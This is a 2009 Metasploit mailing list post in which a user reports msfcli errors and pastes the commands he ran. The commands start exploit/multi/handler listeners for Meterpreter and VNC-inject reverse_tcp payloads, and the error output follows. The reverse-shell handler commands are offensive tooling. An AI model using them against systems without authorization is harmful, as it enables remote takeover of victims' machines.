Metasploit mailing list archives
msfcli
From: krasn at ans.gr (Nicolas Krassas)
Date: Fri, 27 Mar 2009 13:02:42 +0200
Greetings,
I've encountered a strange problem on msfcli, i'm pasting the lines
below,
root at fr:~/trunk# ./msfcli exploit/multi/handler
PAYLOAD=windows/metepreter/reverse_tcp LHOST=91.xxx.xx.xxx E
[*] Please wait while we load the module tree...
./msfcli:150: undefined method `datastore' for nil:NilClass (NoMethodError)
root at fr:~/trunk# ./msfcli exploit/multi/handler
PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482
DisableCourtesyShell=TRUE E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[-] Exploit failed:
Here above i just pressed ctrl c to interrupt the cli
root at fr:~/trunk# ./msfcli exploit/multi/handler
PAYLOAD=windows/metepreter/reverse_tcp LHOST=91.xxx.xx.xxx LPORT 4444
DisableCourtesyShell=TRUE E
[*] Please wait while we load the module tree...
./lib/msf/core/data_store.rb:93:in `each': The argument could not be parsed
correctly. (Rex::ArgumentParseError)
from ./lib/msf/core/data_store.rb:93:in `import_options_from_s'
from ./msfcli:140
Again error when i'm using the correct ip address of the host,
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp E
[*] Please wait while we load the module tree...
[-] Exploit failed: The following options failed to validate: LHOST.
And finally
root at fr:~/trunk# ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LHOST=91.xxx.xx.xxx E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
The commands where used one after the other, no change was done on the
system in between.
Regards,
Dinos
